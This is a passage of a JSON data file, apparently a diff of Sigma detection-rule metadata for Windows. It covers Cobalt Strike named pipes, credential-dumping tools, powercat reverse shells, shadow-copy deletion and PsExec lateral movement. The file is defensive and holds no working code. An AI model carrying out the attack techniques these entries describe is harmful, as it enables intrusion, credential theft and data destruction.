"logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", - "value": "Suspicious Dropbox API Usage", - "meta": { - "refs": [ - "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/20", - "filename": "net_connection_win_susp_dropbox_api.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of the API with a tool that the author wasn't aware of" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", - "value": "Suspicious Epmap Connection", - "meta": { - "refs": [ - "https://github.com/RiccardoAncarani/TaskShell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/07/14", - "filename": "net_connection_win_susp_epmap.yml", - "author": "frack113, Tim Shelton (fps)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "value": "Suspicious Outbound Kerberos Connection", - "meta": { - "refs": [ - 
"https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" - ], - "creation_date": "2019/10/24", - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "high", - "falsepositive": [ - "Other browsers" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", - "value": "Microsoft Sync Center Suspicious Network Connections", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" - ], - "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2022/04/28", - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", - "author": "elhoim", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "uuid": "9976fa64-2804-423c-8a5b-646ade840773", - "value": "Suspicious Outbound SMTP Connections", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://www.ietf.org/rfc/rfc2821.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2022/01/07", - "filename": "net_connection_win_susp_outbound_smtp_connections.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Other SMTP tools" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects programs with network connections running in suspicious files system locations", - "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "value": "Suspicious Program Location with Network Connections", - "meta": { - "refs": [ - "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2017/03/19", - "filename": "net_connection_win_susp_prog_location_network_connection.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "value": "Suspicious Outbound RDP Connections", - "meta": { - "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2019/05/15", - "filename": "net_connection_win_susp_rdp.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", - "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", - "value": "Wuauclt Network Connection", - "meta": { - "refs": [ - "https://dtm.uk/wuauclt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/12", - "filename": "net_connection_win_wuauclt_network_connection.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitimate use of wuauclt.exe over the network." 
- ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "value": "Alternate PowerShell Hosts Pipe", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects a named pipe used by Turla group samples", - "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", - "value": "Turla Group Named Pipes", - "meta": { - "refs": [ - "Internal Research", - "https://attack.mitre.org/groups/G0010/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" - ], - "creation_date": "2017/11/06", - "filename": "pipe_created_apt_turla_namedpipes.yml", - "author": "Markus Neis", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", - "value": "Cred Dump-Tools Named Pipes", - "meta": { - "refs": [ - 
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" - ], - "creation_date": "2019/11/01", - "filename": "pipe_created_cred_dump_tools_named_pipes.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "critical", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", - "value": "DiagTrackEoP Default Named Pipe", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/08/03", - "filename": "pipe_created_diagtrack_eop_default_pipe.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", - "value": "EfsPotato Named Pipe", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", - "https://github.com/zcgonvh/EfsPotato", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - 
"creation_date": "2021/08/23", - "filename": "pipe_created_efspotato_namedpipe.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of default named pipes used by the Koh tool", - "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "value": "Koh Default Named Pipes", - "meta": { - "refs": [ - "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" - ], - "creation_date": "2022/07/08", - "filename": "pipe_created_koh_default_pipe.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "value": "CobaltStrike Named Pipe", - "meta": { - "refs": [ - "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", - "https://github.com/Neo23x0/sigma/issues/253", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", - "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/05/25", - "filename": "pipe_created_mal_cobaltstrike.yml", - "author": "Florian Roth, Wojciech Lesicki", - "level": 
"critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "value": "CobaltStrike Named Pipe Pattern Regex", - "meta": { - "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/07/30", - "filename": "pipe_created_mal_cobaltstrike_re.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a named pipe used by known APT malware", - "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "value": "Malicious Named Pipe", - "meta": { - "refs": [ - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://securelist.com/faq-the-projectsauron-apt/75533/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", - 
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2017/11/06", - "filename": "pipe_created_mal_namedpipes.yml", - "author": "Florian Roth, blueteam0ps, elhoim", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects PAExec default named pipe", - "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "value": "PAExec Default Named Pipe", - "meta": { - "refs": [ - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2022/10/26", - "filename": "pipe_created_paexec_default_pipe.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", - "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", - "value": "PowerShell Execution Via Named Pipe", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": "pipe_created_powershell_execution_pipe.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", - "value": "PsExec Default Named Pipe", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2017/06/12", - "filename": "pipe_created_psexec_default_pipe.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", - "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "value": "PsExec Tool Execution From Suspicious Locations - PipeName", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/08/04", - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare legitimate use of psexec from the locations mentioned above" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "value": "PsExec Pipes Artifacts", - "meta": { - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/05/10", - "filename": "pipe_created_psexec_pipes_artifacts.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate Administrator activity" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "uuid": 
"1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "value": "ADFS Database Named Pipe Connection", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", - "https://o365blog.com/post/adfs/", - "https://github.com/Azure/SimuLand", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ], - "creation_date": "2021/10/08", - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Processes in the filter condition" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "value": "CobaltStrike Named Pipe Patterns", - "meta": { - "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/07/30", - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", - "author": "Florian Roth, Christian Burkard", - "level": "high", - "falsepositive": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "value": "WMI Event Consumer Created 
Named Pipe", - "meta": { - "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" - ], - "tags": [ - "attack.t1047", - "attack.execution" - ], - "creation_date": "2021/09/01", - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", - "value": "Alternate PowerShell Hosts", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/08/11", - "filename": "posh_pc_alternate_powershell_hosts.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "medium", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "value": "Delete Volume Shadow Copies Via WMI With PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", - "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/06/03", - "filename": "posh_pc_delete_volume_shadow_copies.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "uuid": "6331d09b-4785-4c13-980f-f96661356249", - "value": "PowerShell Downgrade Attack - PowerShell", - "meta": { - "refs": [ - "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/22", - "filename": "posh_pc_downgrade_attack.yml", - "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell called from an executable by the version mismatch method", - "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", - "value": "PowerShell Called from an Executable Version Mismatch", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_pc_exe_calling_ps.yml", - 
"author": "Sean Metcalf (source), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", - "value": "Netcat The Powershell Version", - "meta": { - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], - "creation_date": "2021/07/21", - "filename": "posh_pc_powercat.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote PowerShell sessions", - "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", - "value": "Remote PowerShell Session (PS Classic)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2019/08/10", - "filename": "posh_pc_remote_powershell_session.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Legitimate use remote PowerShell sessions" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects renamed powershell", - "uuid": 
"30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", - "value": "Renamed Powershell Under Powershell Channel", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/06/29", - "filename": "posh_pc_renamed_powershell.yml", - "author": "Harish Segar, frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell download command", - "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", - "value": "Suspicious PowerShell Download", - "meta": { - "refs": [ - 
"https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_pc_susp_download.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", - "value": "Use Get-NetTCPConnection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2021/12/10", - "filename": "posh_pc_susp_get_nettcpconnection.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - 
